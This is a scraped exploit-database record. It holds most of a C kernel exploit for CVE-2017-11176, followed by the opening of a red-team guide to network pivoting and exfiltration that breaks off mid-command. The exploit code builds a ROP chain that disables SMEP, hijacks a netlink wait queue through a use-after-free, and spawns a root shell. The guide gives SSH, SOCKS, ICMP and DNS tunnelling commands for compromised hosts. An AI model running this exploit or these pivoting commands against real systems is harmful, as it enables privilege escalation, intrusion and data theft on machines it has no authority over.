iovec iov = {\r\n .iov_base = buf,\r\n .iov_len = sizeof(buf)\r\n };\r\n \r\n struct msghdr mhdr = {\r\n .msg_name = &addr,\r\n .msg_namelen = sizeof(addr),\r\n .msg_iov = &iov,\r\n .msg_iovlen = 1,\r\n .msg_control = NULL,\r\n .msg_controllen = 0,\r\n .msg_flags = 0, \r\n };\r\n \r\n printf(\"[ ] preparing blocking netlink socket\\n\");\r\n \r\n if (_setsockopt(target->sock_fd, SOL_SOCKET, SO_RCVBUF, &new_size, sizeof(new_size)))\r\n perror(\"[-] setsockopt\"); // no worry if it fails, it is just an optim.\r\n else\r\n printf(\"[+] receive buffer reduced\\n\");\r\n \r\n printf(\"[ ] flooding socket\\n\");\r\n while (_sendmsg(guard->sock_fd, &mhdr, MSG_DONTWAIT) > 0)\r\n ;\r\n if (errno != EAGAIN)\r\n {\r\n perror(\"[-] sendmsg\");\r\n goto fail;\r\n }\r\n printf(\"[+] flood completed\\n\");\r\n \r\n printf(\"[+] blocking socket ready\\n\");\r\n \r\n return 0;\r\n \r\nfail:\r\n printf(\"[-] failed to prepare blocking socket\\n\");\r\n return -1;\r\n}\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\n// ROP-chains\r\n#define STORE_EAX(addr) \\\r\n *stack++ = POP_RDI_ADDR; \\\r\n *stack++ = (uint64_t)addr + 4; \\\r\n *stack++ = MOV_PTR_RDI_MIN4_EAX_ADDR;\r\n \r\n#define SAVE_ESP(addr) \\\r\n STORE_EAX(addr);\r\n \r\n#define SAVE_RBP(addr_lo, addr_hi) \\\r\n *stack++ = MOV_RAX_RBP_ADDR; \\\r\n STORE_EAX(addr_lo); \\\r\n *stack++ = SHR_RAX_16_ADDR; \\\r\n *stack++ = SHR_RAX_16_ADDR; \\\r\n STORE_EAX(addr_hi);\r\n \r\n#define CR4_TO_RAX() \\\r\n *stack++ = POP_RBP_ADDR; \\\r\n *stack = (unsigned long) stack + 2*8; stack++; /* skip 0xdeadbeef */ \\\r\n *stack++ = MOV_RAX_CR4_LEAVE_ADDR; \\\r\n *stack++ = 0xdeadbeef; // dummy RBP value!\r\n \r\n#define RDI_TO_CR4() \\\r\n *stack++ = POP_RBP_ADDR; \\\r\n *stack = (unsigned long) stack + 2*8; stack++; /* skip 0xdeadbeef */ \\\r\n *stack++ = MOV_CR4_RDI_LEAVE_ADDR; \\\r\n *stack++ = 0xdeadbeef; // dummy RBP value!\r\n \r\n#define SMEP_MASK (~((uint64_t)(1 << 20))) // 0xffffffffffefffff\r\n \r\n#define DISABLE_SMEP() \\\r\n CR4_TO_RAX(); \\\r\n *stack++ = POP_RDI_ADDR; \\\r\n *stack++ = SMEP_MASK; \\\r\n *stack++ = MOV_EDX_EDI_ADDR; \\\r\n *stack++ = AND_RAX_RDX_ADDR; \\\r\n *stack++ = MOV_EDI_EAX_ADDR; \\\r\n RDI_TO_CR4();\r\n \r\n#define JUMP_TO(addr) \\\r\n *stack++ = POP_RCX_ADDR; \\\r\n *stack++ = (uint64_t) addr; \\\r\n *stack++ = JMP_RCX_ADDR;\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nextern void userland_entry(void); // make GCC happy\r\n \r\nstatic __attribute__((unused)) void wrapper(void) \r\n{\r\n // avoid the prologue\r\n __asm__ volatile( \"userland_entry:\" :: );\r\n \r\n // reconstruct original rbp/rsp\r\n restored_rbp = ((saved_rbp_hi << 32) | saved_rbp_lo);\r\n restored_rsp = ((saved_rbp_hi << 32) | saved_esp);\r\n \r\n __asm__ volatile( \"movq %0, %%rax\\n\"\r\n \"movq %%rax, %%rbp\\n\"\r\n :: \"m\"(restored_rbp) );\r\n \r\n __asm__ volatile( \"movq %0, %%rax\\n\" \r\n \"movq %%rax, %%rsp\\n\"\r\n :: \"m\"(restored_rsp) );\r\n \r\n uint64_t ptr = (uint64_t) &payload;\r\n __asm__ volatile( \"movq %0, %%rax\\n\"\r\n \"call *%%rax\\n\"\r\n :: \"m\"(ptr) );\r\n \r\n // arbitrary call primitive requires a non-null return value (i.e. non zero RAX register)\r\n __asm__ volatile( \"movq $5555, %%rax\\n\"\r\n :: );\r\n \r\n // avoid the epilogue and the \"leave\" instruction\r\n __asm__ volatile( \"ret\" :: );\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic void build_rop_chain(uint64_t *stack)\r\n{\r\n memset((void*)stack, 0xaa, 4096);\r\n \r\n SAVE_ESP(&saved_esp);\r\n SAVE_RBP(&saved_rbp_lo, &saved_rbp_hi);\r\n DISABLE_SMEP();\r\n JUMP_TO(&userland_entry);\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic int allocate_uland_structs(void)\r\n{\r\n // arbitrary value, must not collide with already mapped memory (/proc/<PID>/maps)\r\n void *starting_addr = (void*) 0x20000000;\r\n size_t max_try = 10;\r\n \r\nretry:\r\n if (max_try-- <= 0)\r\n {\r\n printf(\"[-] failed to allocate structures at fixed location\\n\");\r\n return -1;\r\n }\r\n \r\n starting_addr += 4096;\r\n \r\n g_fake_stack = (char*) _mmap(starting_addr, 4096, PROT_READ|PROT_WRITE,\r\n MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);\r\n if (g_fake_stack == MAP_FAILED)\r\n {\r\n perror(\"[-] mmap\");\r\n goto retry;\r\n }\r\n \r\n g_uland_wq_elt = (struct wait_queue*) _mmap(g_fake_stack + 0x100000000, 4096, PROT_READ|PROT_WRITE,\r\n MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);\r\n if (g_uland_wq_elt == MAP_FAILED)\r\n {\r\n perror(\"[-] mmap\");\r\n munmap((void*)g_fake_stack, 4096);\r\n goto retry;\r\n }\r\n \r\n // paranoid check\r\n if ((char*)g_uland_wq_elt != ((char*)g_fake_stack + 0x100000000))\r\n {\r\n munmap((void*)g_fake_stack, 4096);\r\n munmap((void*)g_uland_wq_elt, 4096);\r\n goto retry;\r\n }\r\n \r\n printf(\"[+] userland structures allocated:\\n\");\r\n printf(\"[+] g_uland_wq_elt = %p\\n\", g_uland_wq_elt);\r\n printf(\"[+] g_fake_stack = %p\\n\", g_fake_stack);\r\n \r\n return 0;\r\n}\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\nstatic bool can_use_realloc_gadget(void)\r\n{\r\n int fd;\r\n int ret;\r\n bool usable = false;\r\n char buf[32];\r\n \r\n if ((fd = _open(\"/proc/sys/net/core/optmem_max\", O_RDONLY)) < 0)\r\n {\r\n perror(\"[-] open\");\r\n // TODO: fallback to sysctl syscall\r\n return false; // we can't conclude, try it anyway or not ?\r\n }\r\n \r\n memset(buf, 0, sizeof(buf));\r\n if ((ret = _read(fd, buf, sizeof(buf))) <= 0)\r\n {\r\n perror(\"[-] read\");\r\n goto out;\r\n }\r\n printf(\"[ ] optmem_max = %s\", buf);\r\n \r\n if (atol(buf) > 512) // only test if we can use the kmalloc-1024 cache\r\n usable = true;\r\n \r\nout:\r\n _close(fd);\r\n return usable;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic int init_realloc_data(void)\r\n{\r\n struct cmsghdr *first;\r\n int* pid = (int*)&g_realloc_data[NLK_PID_OFFSET];\r\n void** groups = (void**)&g_realloc_data[NLK_GROUPS_OFFSET];\r\n struct wait_queue_head *nlk_wait = (struct wait_queue_head*) &g_realloc_data[NLK_WAIT_OFFSET];\r\n \r\n memset((void*)g_realloc_data, 'A', sizeof(g_realloc_data));\r\n \r\n // necessary to pass checks in __scm_send()\r\n first = (struct cmsghdr*) &g_realloc_data;\r\n first->cmsg_len = sizeof(g_realloc_data);\r\n first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to \"skip\" cmsg\r\n first->cmsg_type = 1; // <---- ARBITRARY VALUE\r\n \r\n // used by reallocation checker\r\n *pid = MAGIC_NL_PID;\r\n *groups = MAGIC_NL_GROUPS;\r\n \r\n // the first element in nlk's wait queue is our userland element (task_list field!)\r\n BUILD_BUG_ON(offsetof(struct wait_queue_head, task_list) != WQ_HEAD_TASK_LIST_OFFSET);\r\n nlk_wait->slock = 0;\r\n nlk_wait->task_list.next = (struct list_head*)&g_uland_wq_elt->task_list;\r\n nlk_wait->task_list.prev = (struct list_head*)&g_uland_wq_elt->task_list;\r\n \r\n // initialise the \"fake\" second element (because of list_for_each_entry_safe())\r\n g_fake_next_elt.next = (struct list_head*)&g_fake_next_elt; // point to itself\r\n g_fake_next_elt.prev = (struct list_head*)&g_fake_next_elt; // point to itself\r\n \r\n // initialise the userland wait queue element\r\n BUILD_BUG_ON(offsetof(struct wait_queue, func) != WQ_ELMT_FUNC_OFFSET);\r\n BUILD_BUG_ON(offsetof(struct wait_queue, task_list) != WQ_ELMT_TASK_LIST_OFFSET);\r\n g_uland_wq_elt->flags = WQ_FLAG_EXCLUSIVE; // set to exit after the first arbitrary call\r\n g_uland_wq_elt->private = NULL; // unused\r\n g_uland_wq_elt->func = (wait_queue_func_t) XCHG_EAX_ESP_ADDR; // <----- arbitrary call! \r\n g_uland_wq_elt->task_list.next = (struct list_head*)&g_fake_next_elt;\r\n g_uland_wq_elt->task_list.prev = (struct list_head*)&g_fake_next_elt;\r\n printf(\"[+] g_uland_wq_elt.func = %p\\n\", g_uland_wq_elt->func);\r\n \r\n return 0;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic bool check_realloc_succeed(int sock_fd, int magic_pid, unsigned long magic_groups)\r\n{\r\n struct sockaddr_nl addr;\r\n size_t addr_len = sizeof(addr);\r\n \r\n memset(&addr, 0, sizeof(addr));\r\n // this will invoke \"netlink_getname()\" (uncontrolled read)\r\n if (_getsockname(sock_fd, &addr, &addr_len))\r\n {\r\n perror(\"[-] getsockname\");\r\n goto fail;\r\n }\r\n printf(\"[ ] addr_len = %lu\\n\", addr_len);\r\n printf(\"[ ] addr.nl_pid = %d\\n\", addr.nl_pid);\r\n printf(\"[ ] magic_pid = %d\\n\", magic_pid);\r\n \r\n if (addr.nl_pid != magic_pid)\r\n {\r\n printf(\"[-] magic PID does not match!\\n\");\r\n goto fail;\r\n }\r\n \r\n if (addr.nl_groups != magic_groups) \r\n {\r\n printf(\"[-] groups pointer does not match!\\n\");\r\n goto fail;\r\n }\r\n \r\n return true;\r\n \r\nfail:\r\n printf(\"[-] failed to check realloc success status!\\n\");\r\n return false;\r\n}\r\n \r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic int init_unix_sockets(struct realloc_thread_arg * rta)\r\n{\r\n struct timeval tv;\r\n static int sock_counter = 0;\r\n \r\n if (((rta->recv_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) ||\r\n ((rta->send_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0))\r\n {\r\n perror(\"[-] socket\");\r\n goto fail;\r\n }\r\n \r\n // bind an \"abstract\" socket (first byte is NULL)\r\n memset(&rta->addr, 0, sizeof(rta->addr));\r\n rta->addr.sun_family = AF_UNIX;\r\n sprintf(rta->addr.sun_path + 1, \"sock_%lx_%d\", _gettid(), ++sock_counter);\r\n if (_bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))\r\n {\r\n perror(\"[-] bind\");\r\n goto fail;\r\n }\r\n \r\n if (_connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))\r\n {\r\n perror(\"[-] connect\");\r\n goto fail;\r\n }\r\n \r\n // set the timeout value to MAX_SCHEDULE_TIMEOUT\r\n memset(&tv, 0, sizeof(tv));\r\n if (_setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv)))\r\n {\r\n perror(\"[-] setsockopt\");\r\n goto fail;\r\n }\r\n \r\n return 0;\r\n \r\nfail:\r\n // TODO: release everything\r\n printf(\"[-] failed to initialize UNIX sockets!\\n\");\r\n return -1;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic void* realloc_thread(void *arg)\r\n{\r\n struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg;\r\n struct msghdr mhdr;\r\n char buf[200];\r\n \r\n // initialize msghdr\r\n struct iovec iov = {\r\n .iov_base = buf,\r\n .iov_len = sizeof(buf),\r\n };\r\n memset(&mhdr, 0, sizeof(mhdr));\r\n mhdr.msg_iov = &iov;\r\n mhdr.msg_iovlen = 1;\r\n \r\n // the thread should inherit main thread cpumask, better be sure and redo-it!\r\n if (migrate_to_cpu0())\r\n goto fail;\r\n \r\n // make it block\r\n while (_sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0)\r\n ;\r\n if (errno != EAGAIN)\r\n { \r\n perror(\"[-] sendmsg\");\r\n goto fail;\r\n }\r\n \r\n // use the arbitrary data now\r\n iov.iov_len = 16; // don't need to allocate lots of memory now\r\n mhdr.msg_control = (void*)g_realloc_data; // use the ancillary data buffer\r\n mhdr.msg_controllen = sizeof(g_realloc_data);\r\n \r\n g_nb_realloc_thread_ready++;\r\n \r\n while (!g_realloc_now) // spinlock until the big GO!\r\n ;\r\n \r\n // the next call should block while \"reallocating\"\r\n if (_sendmsg(rta->send_fd, &mhdr, 0) < 0)\r\n {\r\n perror(\"[-] sendmsg\");\r\n goto fail;\r\n }\r\n \r\n return NULL;\r\n \r\nfail:\r\n printf(\"[-] REALLOC THREAD FAILURE!!!\\n\");\r\n return NULL;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs)\r\n{\r\n int thread = 0;\r\n int ret = -1;\r\n \r\n if (!can_use_realloc_gadget())\r\n {\r\n printf(\"[-] can't use the 'ancillary data buffer' reallocation gadget!\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] can use the 'ancillary data buffer' reallocation gadget!\\n\");\r\n \r\n if (init_realloc_data())\r\n {\r\n printf(\"[-] failed to initialize reallocation data!\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] reallocation data initialized!\\n\");\r\n \r\n printf(\"[ ] initializing reallocation threads, please wait...\\n\");\r\n for (thread = 0; thread < nb_reallocs; ++thread)\r\n {\r\n if (init_unix_sockets(&rta[thread]))\r\n {\r\n printf(\"[-] failed to init UNIX sockets!\\n\");\r\n goto fail;\r\n }\r\n \r\n if ((ret = pthread_create(&rta[thread].tid, NULL, realloc_thread, &rta[thread])) != 0)\r\n {\r\n perror(\"[-] pthread_create\");\r\n goto fail;\r\n }\r\n }\r\n \r\n // wait until all threads have been created\r\n while (g_nb_realloc_thread_ready < nb_reallocs)\r\n _sched_yield(); // don't run me, run the reallocator threads!\r\n \r\n printf(\"[+] %lu reallocation threads ready!\\n\", nb_reallocs);\r\n \r\n return 0;\r\n \r\nfail:\r\n printf(\"[-] failed to initialize reallocation\\n\");\r\n return -1;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\n// keep this inlined, we can't loose any time (critical path)\r\nstatic inline __attribute__((always_inline)) void realloc_NOW(void)\r\n{\r\n g_realloc_now = 1;\r\n _sched_yield(); // don't run me, run the reallocator threads!\r\n sleep(5);\r\n}\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\nint main(void)\r\n{\r\n int sock_fd2 = -1;\r\n int val;\r\n struct realloc_thread_arg rta[NB_REALLOC_THREADS];\r\n \r\n printf(\"[ ] -={ CVE-2017-11176 Exploit }=-\\n\");\r\n \r\n if (migrate_to_cpu0())\r\n {\r\n printf(\"[-] failed to migrate to CPU#0\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] successfully migrated to CPU#0\\n\");\r\n \r\n if (allocate_uland_structs())\r\n {\r\n printf(\"[-] failed to allocate userland structures!\\n\");\r\n goto fail;\r\n }\r\n \r\n build_rop_chain((uint64_t*)g_fake_stack);\r\n printf(\"[+] ROP-chain ready\\n\");\r\n \r\n memset(rta, 0, sizeof(rta));\r\n if (init_reallocation(rta, NB_REALLOC_THREADS))\r\n {\r\n printf(\"[-] failed to initialize reallocation!\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] reallocation ready!\\n\");\r\n \r\n if (find_netlink_candidates(&g_target, &g_guard))\r\n {\r\n printf(\"[-] failed to find netlink candidates\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] netlink candidates ready:\\n\");\r\n printf(\"[+] target.pid = %d\\n\", g_target.pid);\r\n printf(\"[+] guard.pid = %d\\n\", g_guard.pid);\r\n \r\n if (fill_receive_buffer(&g_target, &g_guard))\r\n goto fail;\r\n \r\n if (((unblock_fd = _dup(g_target.sock_fd)) < 0) ||\r\n ((sock_fd2 = _dup(g_target.sock_fd)) < 0))\r\n {\r\n perror(\"[-] dup\");\r\n goto fail;\r\n }\r\n printf(\"[+] netlink fd duplicated (unblock_fd=%d, sock_fd2=%d)\\n\", unblock_fd, sock_fd2);\r\n \r\n // trigger the bug twice AND immediatly realloc!\r\n if (decrease_sock_refcounter(g_target.sock_fd, unblock_fd) ||\r\n decrease_sock_refcounter(sock_fd2, unblock_fd))\r\n {\r\n goto fail;\r\n }\r\n realloc_NOW();\r\n \r\n // close it before invoking the arbitrary call\r\n close(g_guard.sock_fd);\r\n printf(\"[+] guard socket closed\\n\");\r\n \r\n if (!check_realloc_succeed(unblock_fd, MAGIC_NL_PID, MAGIC_NL_GROUPS))\r\n {\r\n printf(\"[-] reallocation failed!\\n\");\r\n // TODO: retry the exploit\r\n goto fail;\r\n }\r\n printf(\"[+] reallocation succeed! Have fun :-)\\n\");\r\n \r\n \r\n // trigger the arbitrary call primitive\r\n printf(\"[ ] invoking arbitrary call primitive...\\n\");\r\n val = 3535; // need to be different than zero\r\n if (_setsockopt(unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &val, sizeof(val)))\r\n {\r\n perror(\"[-] setsockopt\");\r\n goto fail;\r\n }\r\n printf(\"[+] arbitrary call succeed!\\n\");\r\n \r\n printf(\"[+] exploit complete!\\n\");\r\n \r\n printf(\"[ ] popping shell now!\\n\");\r\n char* shell = \"/bin/bash\";\r\n char* args[] = {shell, \"-i\", NULL};\r\n execve(shell, args, NULL);\r\n \r\n return 0;\r\n \r\nfail:\r\n printf(\"[-] exploit failed!\\n\");\r\n PRESS_KEY();\r\n return -1;\r\n}\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\n\n# 0day.today [2018-10-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/31273"}], "exploitdb": [{"lastseen": "2018-10-08T16:29:44", "description": "A Red Teamer\u2019s guide to pivoting", "published": "2017-03-23T00:00:00", "type": "exploitdb", "title": "A Red Teamer\u2019s guide to pivoting", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11176"], "modified": "2017-03-23T00:00:00", "id": "EDB-ID:45554", "href": "https://www.exploit-db.com/exploits/45554/", "sourceData": "# A Red Teamer's guide to pivoting\r\n\r\nPenetration testers often traverse logical network boundaries in order to gain access to client\u2019s critical infrastracture. Common scenarios include developing the attack into the internal network after successful perimeter breach or gaining access to initialy unroutable network segments after compromising hosts inside the organization. Pivoting is a set of techniques used during red team/pentest engagements which make use of attacker-controlled hosts as logical network hops with the aim of amplifying network visibility. In this post I\u2019ll cover common pivoting techniques and tools available.\r\n\r\nContents\r\n========\r\n\r\n* Target with public IP\r\n * SSH port forwarding\r\n * VPN over SSH\r\n * 3proxy\r\n* NAT scenario\r\n * SSH reverse port forwarding /w 3proxy\r\n * Rpivot\r\n* Exfiltrating from the internal network\r\n * ICMP tunneling\r\n * DNS tunneling\r\n * Iodine\r\n * Dnscat2\r\n * Corporate HTTP proxy as a way out\r\n * Rpivot\r\n * Cntlm\r\n * OpenVpn over HTTP proxy\r\n* Making use of SOCKS with proxychains\r\n* DNS with proxychains\r\n* Beutifying your web shell\r\n * Python PTY shell\r\n * Socat\r\n * Bind shell\r\n * Reverse shell\r\n * Terminal size\r\n * Tsh\r\n\r\nTarget with public IP\r\n---------------------\r\n\r\nA prevalent scenario. Let\u2019s say you find an RCE bug in a web-app accessible from the internet. You upload a shell and want to develop your attack into the internal network. Note that in this specific scenario you should able to bind ports on the compromised host and those ports should be accessible from the external network.\r\n\r\n### SSH port forwarding\r\n\r\nManaged to find credentials to the SSH-service running on the host? Great! Connect to the host as follows:\r\n\r\n`ssh [[email\u00a0protected]](/cdn-cgi/l/email-protection) -D 1080`\r\n\r\nThis will spawn a socks server on the attacker\u2019s side (ssh-client side). Welcome to the intranet ;) It is also possible to forward one specific port to a specific host. Let\u2019s say you need to access an SMB share in the internal network on host 192.168.1.1.\r\n\r\n`ssh [[email\u00a0protected]](/cdn-cgi/l/email-protection) -L 445:192.168.1.1:445`\r\n\r\nThis way a port 445 will be opened on the attacker\u2019s side. Note, that to bind privileged ports (such as 445) you will need root privileges on your machine.\r\n\r\n#### VPN over SSH\r\n\r\nSince openssh release 4.3 it is possible to tunnel layer 3 network traffic via an established ssh channel. This has an advantage over a typical tcp tunnel because you are in control of ip traffic. So, for example, you are able to perform SYN-scan with nmap and use your tools directly without resorting to `proxychains` or other proxifying tools. It\u2019s done via the creation of **tun** devices on client and server side and transferring the data between them over ssh connection. This is quite simple, but you need root on both machines since the creation of tun devices is a privileged operation. These lines should be present in your `/etc/ssh/sshd_config` file (server-side):\r\n\r\n PermitRootLogin yes\r\n PermitTunnel yes\r\n \r\n\r\nThe following command on the client will create a pair of tun devices on client and server:\r\n\r\n`ssh [[email\u00a0protected]](/cdn-cgi/l/email-protection) -w any:any`\r\n\r\nThe flag `-w` accepts the number of tun device on each side separated with a colon. It can be set explicitly - `-w 0:0` or you can use `-w any:any` syntax to take the next available tun device.\r\n\r\nThe tunnel between the tun devices is enabled but the interfaces are yet to be configured. Example of configuring client-side:\r\n\r\n`ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0`\r\n\r\nServer-side:\r\n\r\n`ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0`\r\n\r\nEnable ip forwarding and NAT on the server:\r\n\r\n echo 1 > /proc/sys/net/ipv4/ip_forward\r\n iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE\r\n \r\n\r\nNow you can make the peer host `1.1.1.1` your default gateway or route a specific host/network through it:\r\n\r\n`route add -net 10.0.0.0/16 gw 1.1.1.1`\r\n\r\nIn this example the server\u2019s external network interface is `eth0` and the newly created tun devices on both sides are `tun0`.\r\n\r\n### 3proxy\r\n\r\nGet it here - [https://github.com/z3APA3A/3proxy/releases](https://github.com/z3APA3A/3proxy/releases). This tools works for multiple platforms. There are pre-built binaries for Windows. As for Linux, you will need to build it yourself which is not a rocket science, just `./configure && make` :) This tool is a swiss army knife in the proxy world so it has a ton of functionality. I usually use it either as a socks proxy or as a port forwarder.\r\n\r\nThis tool gets all of its options from config file. To run it:\r\n\r\n`3proxy.exe config_file`\r\n\r\nor if you are on a Linux system:\r\n\r\n`./3proxy config_file`\r\n\r\nTo run 3proxy as a socks5 proxy at port 1080 put the following line in the config:\r\n\r\n`socks -p1080`\r\n\r\nNow it\u2019s possible to tunnel most of your pentesting tools through this proxy to develop the attack in the internal network. This is just a basic setup which is not very secure. You can play with options to place authentication and/or ip-based access control rules. Go check the full manual here - [https://3proxy.ru/howtoe.asp](https://3proxy.ru/howtoe.asp). To tunnel a specific port use the following syntax:\r\n\r\n`tcppm <localport> <targethost> <targetport>`\r\n\r\nNAT scenario\r\n------------\r\n\r\nThis is by far the most common situation I encounter during engagements. The traffic to the target is being forwared on per-port basis. This means that all ports bound other than those being in the port forwarding rules won\u2019t be accessible from outside. One possible solution is to initiate a reverse connection. The tools described below will help you with that.\r\n\r\n### SSH reverse port forwarding /w 3proxy\r\n\r\nThis pivoting setup looks something like this:\r\n\r\nRun 3proxy service with the following config on the target server:\r\n\r\n`socks -p31337`\r\n\r\nCreate a separate user on the receiving side (attacker\u2019s machine).\r\n\r\n`adduser sshproxy`\r\n\r\nThis user has to be low-privileged and shouldn\u2019t have shell privileges. After all, you don\u2019t want to get reverse pentested, do ya? :) Edit /etc/passwd and switch shell to /bin/false. It should look like:\r\n\r\n root:x:0:0:root:/root:/bin/bash\r\n ...\r\n sshproxy:x:1000:1001:,,,:/home/sshproxy:/bin/false\r\n ...\r\n \r\n\r\nNow connect to your server with the newly created user with `-R` flag. Linux system:\r\n\r\n`ssh [[email\u00a0protected]](/cdn-cgi/l/email-protection)_server -R 31337:127.0.0.1:31337`\r\n\r\nFor windows you will need to upload [plink.exe](http://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) first. This is a console version of putty. To run it:\r\n\r\n`plink.exe [[email\u00a0protected]](/cdn-cgi/l/email-protection)_server -R 31337:127.0.0.1:31337`\r\n\r\nThe `-R` flag allows you to bind port on the server side. All connections to this port will be relayed to a specified port on the client. This way we can run 3proxy socks service on the client side (compromised machine) and access this port on the attacker\u2019s host via ssh `-R` flag.\r\n\r\n### Rpivot\r\n\r\nThis is my favorite method of traversing NAT connections. [Rpivot](https://github.com/artkond/rpivot) is a reverse socks proxy tool that allows you to tunnel traffic via socks proxy. It connects back to your machine and binds a socks proxy on it. It works just like `ssh -D` but in opposite direction. Server side:\r\n\r\n`python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0`\r\n\r\nClient side:\r\n\r\n`python client.py --server-ip <ip> --server-port 9999`\r\n\r\nAs a result, a socks4 proxy service will be bound server side on port 1080.\r\n\r\nExfiltrating from the internal network\r\n--------------------------------------\r\n\r\nHere\u2019s a different case. Let\u2019s say your social engineering gig ended up placing you in the internal network. You have limited connectivity and ability to execute command on the compromised machine. Of course, if the internet is directly routed and not firewalled you can resort to any technique described above. But if you\u2019re not so lucky there\u2019re still ways to pivot your way out.\r\n\r\n### ICMP tunneling\r\n\r\nIf icmp traffic is allowed to external networks then most likely you can establish an icmp tunnel. The downside is that you will need root/administrator privileges on the target system becase of the necesity to use raw sockets. Check this tool out - [http://code.gerade.org/hans/](http://code.gerade.org/hans/). Personally I\u2019ve never tried running it on Windows. It works like a charm on Linux tho. Server side command (attacker\u2019s machine):\r\n\r\n`./hans -v -f -s 1.1.1.1 -p [[email\u00a0protected]](/cdn-cgi/l/email-protection)`\r\n\r\nThe `-v` flag is for verbosity, the `-f` flag is to run in foreground and the `-s` flag\u2019s value is the server\u2019s ip on the newly created tun interface.\r\n\r\nClient side:\r\n\r\n`./hans -f -c <server_ip> -p [[email\u00a0protected]](/cdn-cgi/l/email-protection) -v`\r\n\r\nAfter successful connection the client should be directly visible at 1.1.1.100:\r\n\r\n # ping 1.1.1.100\r\n PING 1.1.1.100 (1.1.1.100) 56(84) bytes of data.\r\n 64 bytes from 1.1.1.100: icmp_seq=1 ttl=65 time=42.9 ms\r\n \r\n\r\nNow you can use this machine as gate into the internal network. Use this machine a default gateway or connect to a management interface (ssh/tsh/web shell).\r\n\r\n### DNS tunneling\r\n\r\nIf any WAN traffic is blocked but external host names are resolved then there\u2019s a possibility of tunneling traffic via DNS queries. You need a domain registered for this technique to work. [This manual](http://dev.kryo.se/iodine/wiki/HowtoSetup) might help you with setting up your name server.\r\n\r\n#### Iodine\r\n\r\nIf so happens that you got root access on the server you can try [iodine](http://code.kryo.se/iodine/). It works almost like hans icmp tunneling tool - it creates a pair of tun adapters and tunnels data between them as DNS queries. Server side:\r\n\r\n`iodined -f -c -P [[email\u00a0protected]](/cdn-cgi/l/email-protection) 1.1.1.1 tunneldomain.com`\r\n\r\nClient side:\r\n\r\n`iodine -f -P [[email\u00a0protected]](/cdn-cgi/l/email-protection) tunneldomain.com -r`\r\n\r\nSuccessful connection will yield direct client visibility at address 1.1.1.2. Note, that this tunneling technique is quite slow. Your best bet is to use a compressed ssh connection over the resulting connection:\r\n\r\n`ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080`\r\n\r\n#### Dnscat2\r\n\r\n[Dnscat2](https://github.com/iagox86/dnscat2) establishes C&C channel over recursive DNS queries. This tool doesn\u2019t require root/administrator access (works both on windows and linux). It also supports port forwarding. Server side:\r\n\r\n ruby ./dnscat2.rb tunneldomain.com\r\n \r\n\r\nClient side:\r\n\r\n`./dnscat2 tunneldomain.com`\r\n\r\nAfter you receive a connection of server side, you can view the active sessions with `windows` command:\r\n\r\n dnscat2> windows\r\n 0 :: main [active]\r\n dns1 :: DNS Driver running on 0.0.0.0:53 domains = tunneldomain.com [*]\r\n 1 :: command session (debian)\r\n 2 :: sh (debian) [*]\r\n \r\n\r\nTo initiate port forwarding select a command session with `session -i <num>`:\r\n\r\n dnscat2> session -i 1\r\n New window created: 1\r\n New window created: 1\r\n history_size (session) => 1000\r\n This is a command session!\r\n \r\n That means you can enter a dnscat2 command such as\r\n 'ping'! For a full list of clients, try 'help'.\r\n \r\n command session (debian) 1>\r\n \r\n\r\nUse `listen [lhost:]lport rhost:rport` command to forward a port:\r\n\r\n`command session (debian) 1> listen 127.0.0.1:8080 10.0.0.20:80`\r\n\r\nThis will bind port 8080 on the attacker\u2019s machine and forward all connections to 10.0.0.20:80.\r\n\r\n### Corporate HTTP proxy as a way out\r\n\r\nHTTP proxies organization place for their employees to access external web-application present a good exfiltration opportunity given you got the right credentials ;)\r\n\r\n#### Rpivot\r\n\r\nI already mentioned this tool in the NAT traversal section. It also supports connecting to the outside world via NTLM HTTP proxies. Server side command remains intact, use client-side command as follows:\r\n\r\n python client.py --server-ip <rpivot_server_ip> --server-port 9999\\\r\n 